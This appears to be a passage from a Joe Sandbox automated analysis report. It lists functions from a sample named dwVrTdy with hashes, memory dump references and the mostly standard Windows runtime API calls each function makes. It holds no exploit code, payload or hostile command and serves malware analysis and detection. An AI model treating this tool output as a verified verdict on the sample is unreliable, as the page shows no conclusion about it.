Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
Instruction ID: c453223c6d8cd47c47ed22c61a5d91372eb56ab03877e7970ee89db35e276e89
Opcode Fuzzy Hash: 14f4986bc99530db2ff74f8cdd80e9a42ea7e781d18f682f6a14d00a5c4e1902
Instruction Fuzzy Hash: CF117221A0C64281EEA0BF1194131BEA264EF95B80F446431EA8CA7FD6DF7CD842A710

Function 00007FF643F446A0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F4471E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 61eac2af157a3121e9db72a7ab12f62f902abc9e966b57c26774a66953f3b23f
Instruction ID: 53ad7e4ebcf70bbc147baffbb6f4522cc7605f433147a713080b0188b35ef670
Opcode Fuzzy Hash: 61eac2af157a3121e9db72a7ab12f62f902abc9e966b57c26774a66953f3b23f
Instruction Fuzzy Hash: F501F732A1C68481EB54BB15E24137DB251E725FC8F148031DB8C27BCADE2CD8D19740

Function 00007FF643F69CEC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F69D14

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
Instruction ID: 5c7e9db283dbd9616e620a2f0460926bb10bae5dfaf7a41f643482c145d0b2be
Opcode Fuzzy Hash: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
Instruction Fuzzy Hash: 8A11B632D0C68241FFE1BF1098133BA62A0EF95B80F545531EA8CA7AD7DF6CD801A740

Function 00007FF643F6C540 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6C594

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction ID: 5460ebf05ed9d9f070b389c27b452d5dca3d6b38ec5c7886792c0c1c08f5fbe4
Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
Instruction Fuzzy Hash: AA01C861A0C78240E994FB629902079A794BF89FE0F086631EEACA3BD6DF3CD4025300

Function 00007FF643F487B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF643F5E3AC: FindClose.KERNEL32(?,?,?,?,00007FF643F45182), ref: 00007FF643F5E3B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F48816

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 149518be8d4400a884f8e949f87d89ecf9f0b2ca6220f1b426dc06dfc5b5497f
Instruction ID: 081f0c5f606520a16d7988d9580b12b8072b992c7796fc10535f710f31f522a4
Opcode Fuzzy Hash: 149518be8d4400a884f8e949f87d89ecf9f0b2ca6220f1b426dc06dfc5b5497f
Instruction Fuzzy Hash: 03018161F2958281EF94FB69D15637C2361EF54F88F945032CB0CA769AEF2ED8819304

Function 00007FF643F4C350 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF643F4C3B2

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
Instruction ID: cb89a0b48a1565e543762563989c9a951fa57ccb019b1f54acb8896cd5fcdf78
Opcode Fuzzy Hash: 4a38643fc9bde780cb08b9dba913868f8f7e5423c6d65e71be7f4fa78a6398bc
Instruction Fuzzy Hash: A6017522B1C78181DA90FB17E5411692360EB98FC8F142533EF4D97796EE38D4528740

Function 00007FF643F69E7C Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F69EA0

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
Instruction ID: 0a8ad0f11dcd88b682cdf45adf3b2719f90e997cdf5e63ab36d42208b7972703
Opcode Fuzzy Hash: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
Instruction Fuzzy Hash: 6AF0A731B0D74285EBD4FB56D4929BD2160AF68BC0F545034EE5C93BC2EF2DE4695720

Function 00007FF643F69EDC Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F69F00

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
Instruction ID: b39193da4bd0839cc1c2769559a8a22db549d0569715f034f3f147ec2d2bf8bc
Opcode Fuzzy Hash: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
Instruction Fuzzy Hash: FCF0A031B0D74245EED4FB96D5926B92194AF18BC0F44A034EA5DD3BC2EE2CF4699710

Function 00007FF643F6BE50 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF643F6BE6F

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
Instruction ID: 55fa155cfe48ae0d51dd85f224f4e22a3e076bbd07a94151d34938bdb75be5bf
Opcode Fuzzy Hash: f9f77e95c41b4df8bdfd08f931793a2a7754076da3f363fd411357bfb2997952
Instruction Fuzzy Hash: E4E02231A2C64381EBE87BB5918207C61609F147F0F245331E73C833C6EF2CA865A200

Function 00007FF643F62B80 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF643F62B94

Part of subcall function 00007FF643F64CD0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF643F64CD8
Part of subcall function 00007FF643F64CD0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF643F64CDD

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
String ID:
API String ID: 1208906642-0
Opcode ID: 2659d3a67adecb31f68455b68035f6cd17736bc8922089f6fe0cc6590dcda595
Instruction ID: a99ae76d6f512da7316cc264a80538da9fe574a84d1c95a4387e3a1a5c5afa65
Opcode Fuzzy Hash: 2659d3a67adecb31f68455b68035f6cd17736bc8922089f6fe0cc6590dcda595
Instruction Fuzzy Hash: 62E0B610D0C243A1FDD53AA125032B922405F22305E6024BCD91DF73C39E4D70577621

Function 00007FF643F77284 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF643F772AF

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: fea51e8d421d60c254057464f59713b649fbd1e7b43c8955b8b34b86c91967dc
Instruction ID: 6c276ee3173f7dab52e28a787ea4d57915b286a2d9cead07aeb780529e749dbe
Opcode Fuzzy Hash: fea51e8d421d60c254057464f59713b649fbd1e7b43c8955b8b34b86c91967dc
Instruction Fuzzy Hash: 26E0EC50D2DA02C0FAD4773099430B912501F65310FA00935E02DF32E2EF1C6449BA20

Function 00007FF643F5E3AC Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(?,?,?,?,00007FF643F45182), ref: 00007FF643F5E3B6

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
Instruction ID: ccdf4051dbd2890faa0e36757a30bc1793c655b093e7e420239066992fba6017
Opcode Fuzzy Hash: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
Instruction Fuzzy Hash: A8C08C20E0D403D1E8E83B61084B1B401905F34370F506B30D63DE34E2EE1CB06A6A01

Function 00007FF643F5E38C Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 00007FF643F5E390

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
Instruction ID: 53904a4e97dd8c778ff2650d92299f75fcd3942f3d8dae3e70744be87b85e5c8
Opcode Fuzzy Hash: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
Instruction Fuzzy Hash: 20C09B15F1D503C2E6D43F735C4316511D06F94751F818430C50DE21F0DD5C91E76711

Function 00007FF643F787C4 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF643F7715E,?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?), ref: 00007FF643F78819

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 3b3465d18bc41eb21600031e2ba75c449a889ef4c951b94005d768bcc6061c80
Instruction ID: 6ed58fbede18e49e611632d99498dcd33a67c569d24e87171077882d6926c02a
Opcode Fuzzy Hash: 3b3465d18bc41eb21600031e2ba75c449a889ef4c951b94005d768bcc6061c80
Instruction Fuzzy Hash: D4F01D54F0D60782FED4BAA69A133F512955F59B80F8C5430DD0EFB6D2EF1CE585A210

Function 00007FF643F7A168 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF643F647BB,?,?,?,?,?,?,?,?,?,00007FF643F5EED5), ref: 00007FF643F7A1A6

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
Instruction ID: fe74df70d982706888aec4ced459a85321efded33b843dbfa1d2bd63ac31cdae
Opcode Fuzzy Hash: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
Instruction Fuzzy Hash: 61F08C58F0C20381FEE87AA29D0337912805F48BB0F0A5630DC2EE77C2DFACE454AA10

Non-executed Functions

Function 00007FF643F83D04 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

TranslateName.LIBCMT ref: 00007FF643F83D6E
TranslateName.LIBCMT ref: 00007FF643F83DA9
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF643F74DC8), ref: 00007FF643F83DF0
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF643F74DC8), ref: 00007FF643F83E28
GetLocaleInfoW.KERNEL32 ref: 00007FF643F83FE5

Strings

utf8, xrefs: 00007FF643F83F0C

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
Instruction ID: 759414cee2d090ed8fb9b867b2e638d97b6c051f21cd9899da6c3669ae467268
Opcode Fuzzy Hash: 48495feded033ddc165fff888afdd27fec235c819a74216447bbbb5d54d34aaa
Instruction Fuzzy Hash: 1D917C26A0C74285EBACBF22D4422AD63A4EF44B84F445132DE5CA77E5EF3CE555E340

Function 00007FF643F8474C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF643F76F84: GetLastError.KERNEL32 ref: 00007FF643F76F93
Part of subcall function 00007FF643F76F84: FlsGetValue.KERNEL32 ref: 00007FF643F76FA8
Part of subcall function 00007FF643F76F84: SetLastError.KERNEL32 ref: 00007FF643F77033

Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F76FC9

GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF643F848BC

Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F76FF6
Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F77007
Part of subcall function 00007FF643F76F84: FlsSetValue.KERNEL32 ref: 00007FF643F77018

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF643F74DC1), ref: 00007FF643F848A3
ProcessCodePage.LIBCMT ref: 00007FF643F848E6
IsValidCodePage.KERNEL32 ref: 00007FF643F848F8
IsValidLocale.KERNEL32 ref: 00007FF643F8490E
GetLocaleInfoW.KERNEL32 ref: 00007FF643F8496A
GetLocaleInfoW.KERNEL32 ref: 00007FF643F84986

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
Instruction ID: aaac35eb5750814d50385342e18788e53432eb4e77e8dd3a071a4cfeee355150
Opcode Fuzzy Hash: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
Instruction Fuzzy Hash: 0B714722F1C64289FBA9FF62D8526BC23A4BF44748F544535CA1DA36D5EF3CA845E310

Function 00007FF643F636EC Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF643F63708
RtlCaptureContext.KERNEL32 ref: 00007FF643F63735
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF643F6374F
RtlVirtualUnwind.KERNEL32 ref: 00007FF643F63790
IsDebuggerPresent.KERNEL32 ref: 00007FF643F637E4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF643F63801
UnhandledExceptionFilter.KERNEL32 ref: 00007FF643F6380C

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
Instruction ID: 86d53e2db6cc92139157921019b9b83d05038314a140671f148b49b3bebc7f4d
Opcode Fuzzy Hash: 7f9508d7ef5685eae0d28c8f9546a7afb45584fd023bd3bec3c4e2406a6eb4ff
Instruction Fuzzy Hash: 0631507260DB8286EBA0AF60E8813ED7364FB84744F44403ADA4E97BD5DF78D649C710

Function 00007FF643F6CA44 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF643F6CABD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF643F6CAD5
RtlVirtualUnwind.KERNEL32 ref: 00007FF643F6CB10
IsDebuggerPresent.KERNEL32 ref: 00007FF643F6CB49
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF643F6CB53
UnhandledExceptionFilter.KERNEL32 ref: 00007FF643F6CB5E

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
Instruction ID: aadaf61f9b6e081edb445301f15da9368b68c9b2962030546f2c1c8da906127e
Opcode Fuzzy Hash: d191d35ea71748c9bc83f44635b8bcd2d1d38476d095590e11d289bdc63115d6
Instruction Fuzzy Hash: 4B31533260CB8186DBA0EF25E8412AE73A4FB85754F500136EE8D97BA5DF3CD546CB00

Function 00007FF643F50190 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F50605
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F5060B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F50611
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF643F50617

Strings

' is not a number., xrefs: 00007FF643F503B5

Memory Dump Source

Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true

